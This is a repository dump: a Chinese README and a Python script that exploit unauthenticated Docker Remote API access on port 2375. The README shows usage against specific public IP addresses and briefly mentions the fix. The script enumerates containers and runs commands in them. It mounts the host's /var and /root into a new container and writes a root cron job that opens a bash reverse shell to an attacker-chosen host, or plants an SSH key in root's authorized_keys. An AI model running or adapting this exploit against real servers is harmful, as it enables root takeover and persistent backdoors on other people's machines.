[
  {
    "path": "README.md",
    "content": "# docker_api_vul\nDocker Remote API 未授权访问漏洞利用脚本\n\n该漏洞源于 Docker daemon 的 Remote API 在 TCP 端口（如 2375）上未启用 TLS 与认证即对外监听；修复方法是不对外暴露该端口，或启用 TLS 客户端证书校验（dockerd --tlsverify）。\n\n## 安装类库\n\n    pip install -r requirements.txt\n\n## 查看运行的容器\n\n    python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375\n\n## 查看所有的容器\n\n    python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -a\n\n## 查看所有镜像\n\n    python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -l\n\n## 查看端口映射\n\n    python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -L\n\n## 写计划任务（centos,redhat等,加-u参数用于ubuntu等）\n\n    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i 镜像名 -H 反弹ip -P 反弹端口\n    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -u -i 镜像名 -H 反弹ip -P 反弹端口\n\n## 写sshkey(自行修改脚本中的公钥)\n\n    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i 镜像名 -k\n\n## 在容器中执行命令\n\n    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -e \"id\" -I 容器id\n\n## 删除容器\n\n    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -c -I 容器id\n\n## 修改client api版本\n\n    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -v 1.22\n\n## 查看服务端api版本\n\n    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -V\n\n"
  },
  {
    "path": "dockerRemoteApiGetRootShell.py",
    "content": "#-*- coding:utf-8 -*-\n#author:L.N.@insight-labs.org\n\n\nimport urllib2\nimport urllib\nimport json\nimport sys\nimport getopt\nfrom docker import Client\n\ndef http_get(url):\n    response = urllib2.urlopen(url)\n    return response.read()\n\ndef http_post(url, values):\n    jdata = values\n    #print url\n    #print jdata\n    send_headers = {\n        'Content-Type':'application/json'\n    }\n    req = urllib2.Request(url, data=jdata,headers=send_headers)\n    response = urllib2.urlopen(req)\n    return response.read()\n\ndef isset(v):\n    try :\n        type(eval(v))\n    except:\n        return 0\n    else:\n        return 1\n\ndef printport(portsList, name):\n    if isset(\"portsList['IP']\") == 0:\n        portsList['IP']=\"*\"\n        printport(portsList,name)\n    elif isset(\"portsList['Type']\") == 0:\n        portsList['Type']=\"*\"\n        printport(portsList,name)\n    elif isset(\"portsList['PublicPort']\") == 0:\n        portsList['PublicPort']=\"*\"\n        printport(portsList,name)\n    elif isset(\"portsList['PrivatePort']\") == 0:\n        portsList['PrivatePort']=\"*\"\n        printport(portsList,name)\n    else:\n        print \"[-]\"+name+\"[+]\"+portsList['Type']+\"[-]\"+portsList['IP']+\":\"+str(portsList['PrivatePort'])+\" --> \"+host+\":\"+str(portsList['PublicPort'])\n\ndef createClient(host,port,version):\n    clientApiVersion = getversion(host,port,version)\n    print \"[-]ClientApiVersion:\"+clientApiVersion\n    cli = Client(base_url='tcp://'+host+':'+port,version=clientApiVersion)\n    return cli\n\ndef getversion(host,port,version):\n    url = \"http://\"+host+\":\"+port+\"/version\"\n    ret = json.loads(http_get(url))\n    if version != '':\n        clientApiVersion = version\n    else:\n        clientApiVersion = ret['ApiVersion']\n    return clientApiVersion\n\ndef printContainer(host,port,version,allContainer):\n    cli = createClient(host,port,version)\n    if allContainer == 1:\n        ret = 
cli.containers(all=True)\n    else:\n        ret = cli.containers()\n    for info in ret:\n        print \"[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]\"\n        print \"[-] id: \"+info['Id']\n        print \"[-] Names: \"+info['Names'][0]\n        print \"[-] Image: \"+info['Image']\n        print \"[-] Status: \"+info['Status']\n    print \"[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]\"\n\nif __name__ == \"__main__\":\n    opts, args = getopt.getopt(sys.argv[1:], \"v:kauVCcsLli:e:h:p:H:P:I:\")\n    key = 0\n    version =''\n    payload =''\n    sshkey = 'ssh-rsa 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 wanniba@wanniba.com'\n    for op, value in opts:\n        if op ==\"-l\":\n            imagesList = 1\n        elif op == \"-i\":\n            imageName = value\n        elif op == \"-e\":\n            dataExec = value\n        elif op == \"-h\":\n            host = value\n        elif op =='-p':\n            port = value\n        elif op == '-L':\n            portList = 1\n        elif op == '-H':\n            lhsot = value\n        elif op == '-P':\n            lport = value\n        elif op =='-C':\n            createContainer = 1\n        elif op == '-v':\n            version = value\n        elif op == '-V':\n            version = 1\n        elif op == '-c':\n            closeContainer = 1\n        elif op == '-I':\n            imageId = value\n        elif op == '-a':\n            allContainer = 1\n        elif op == '-s':\n            startContainer = 1\n        elif op == '-k':\n            key = 1\n        elif op == '-u':\n            isUbuntu = 1\n            \n    if isset('lhsot') and isset('lport'):\n        if isset('isUbuntu'):\n            payload = '/bin/bash -c \"echo \\\\\\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\\\\\" >> /tmp/spool/cron/crontabs/root\"' #chmod 600\n        else:\n            payload = '/bin/bash -c \"echo \\\\\\\"*/1 * * * * 
/bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\\\\\" >> /tmp/spool/cron/root\"'  #centos,redhat and so on\n        print \"[-]Paylaod: \"+payload\n    if sshkey !='' and key == 1:\n        payload = '/bin/bash -c \"echo \\\\\\\"'+sshkey+'\\\\\\\" >> /tmp1/.ssh/authorized_keys\"'\n        print \"[-]Paylaod: \"+payload\n    if isset('host') and isset('port'):\n        if isset('version') and version == 1:\n            url = \"http://\"+host+\":\"+port+\"/version\"\n            ret = json.loads(http_get(url))\n            print \"[-] ApiVersion: \"+ret['ApiVersion']\n        elif isset('imagesList'):\n            url = \"http://\"+host+\":\"+port+\"/images/json\"\n            ret = json.loads(http_get(url))\n            for info in ret:\n                print \"RepoTags: \"+info['RepoTags'][0]\n        elif isset('createContainer') and isset('imageName'):\n            cli = createClient(host,port,version)\n            container = cli.create_container(image=imageName, command='/bin/bash', tty=True, volumes=['/tmp','/tmp1'], host_config=cli.create_host_config(binds=['/var:/tmp:rw','/root:/tmp1:rw']))\n            print \"[-]Container ID:\"+container['Id']\n            print \"[-]Warning:\"+str(container['Warnings'])\n            response = cli.start(container=container.get('Id'))\n            if isset('isUbuntu'):\n                cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload))\n                print \"[-]create crontabs ......\"\n                cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd='chmod 600 /tmp/spool/cron/crontabs/root'))\n                print \"[-]chmod 600 ......\"\n            else:\n                print cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload))\n                print \"[-]create crontabs ......\"\n        elif isset('closeContainer') and isset('imageId'):\n            cli = createClient(host,port,version)\n            
cli.stop(container=imageId)\n            cli.remove_container(container=imageId)\n        elif isset('startContainer') and isset('imageId'):\n            cli = createClient(host,port,version)\n            cli.start(container=imageId)\n        elif isset('dataExec') and isset('imageId'):\n            cli = createClient(host,port,version)\n            print \"[-]Command:\"+dataExec\n            print cli.exec_start(exec_id=cli.exec_create(container=imageId, cmd=dataExec))\n        elif isset('portList'):\n            url = \"http://\"+host+\":\"+port+\"/containers/json\"\n            ret = json.loads(http_get(url))\n            for pl in ret:\n                if isset(\"pl['Names'][0]\"):\n                    name = pl['Names'][0]\n                else:\n                    name = '*'\n                for portsList in pl['Ports']:\n                    printport(portsList, name)\n        else:\n            if isset('allContainer'):\n                printContainer(host,port,version,allContainer)\n            else:\n                printContainer(host,port,version,0)\n"
  },
  {
    "path": "requirements.txt",
    "content": "docker-py == 1.8.1\n"
  }
]